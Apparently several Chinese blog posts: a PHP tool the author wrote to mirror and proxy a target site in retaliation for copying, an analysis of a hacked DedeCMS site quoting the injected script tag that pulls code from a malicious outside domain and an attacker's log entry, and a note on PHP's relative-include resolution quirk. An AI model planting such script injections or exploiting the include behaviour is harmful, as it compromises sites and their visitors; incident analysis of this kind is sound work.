这个玩意是一次朋友站点被恶意复制后作为反击而写的。功能比较简单指定规则后可以对目标网站进行复制。可以把内容采集到本地,可以通过代理访问目标站点,把目标站点内容传送给浏览者。代码运行在php下,通过网址 http://xxx.com/sitec/admin.php 可以进入一个简陋的管理后台,具体使用方式这里就不作详细说明了。
如果对实现感兴趣请下载源码:Download
如果有更好的想法以及对如何防御恶意站点复制欢迎在留言。
一个朋友的dede站点首页被插入
<script src=”<script src=”http://welcometotheglobalisorg.com/nl.php?p=1″></script>\n
怀疑是被黑了。通过分析日志发现了一条可疑的post提交记录
66.96.128.62 – - [28/Mar/2011:05:33:14 -0700] “POST /data/affection_gris.php HTTP/1.1″ 200 143 “-” “-”
文件affection_gris.php是加密后的文件。
文件源码与解密后的文件:code
google搜索后发现也有部分人遇到这个问题,检测日志也未发现最近几天有可疑的访问dede的记录,似乎affection_gris.php文件突然之间就出现在了网站目录里,所以怀疑是服务器问题,服务器使用的是dreamhost。。另外还遇到个奇怪的问题,我本来想把文件内容直接发布到这篇文章中,但提交的时候总是出现500错误,不知道是wordpress的问题,还是dreamhost服务器的原因。
在php包含中存在一种相对特殊的包含方式,这种方式会根据情况选择实际的包含文件。
比如有这样一个包含关系:a.php包含xx/b.php,xx/b.php包含同目录下的c.php(相对a.php的路径为xx/c.php)。入口是a.php,如果在a.php同目录下存在一个名为c.php的文件,那么此时真正包含的应该是位于a.php同目录下的c.php,而不是xx/c.php。实际上这种包含关系会首先以入口文件目录为工作目录查找是否存在包含的文件,如果存在则包含并退出,如果不存在则依次查找到含有具体包含代码的文件的目录,即这个例子中的xx/目录。
一个更具体的例子:在wordpress中的wp-content/themes/default(如果存在default这个主题),在index.php中include ‘x.php’;并在这个目录下创建x.php,写入几个符号,再到wordpress的根目录下床x.php,访问主题你就会发现实际主题index.php包含的是wordpress根目录下载x.php而非主题中的x.php。
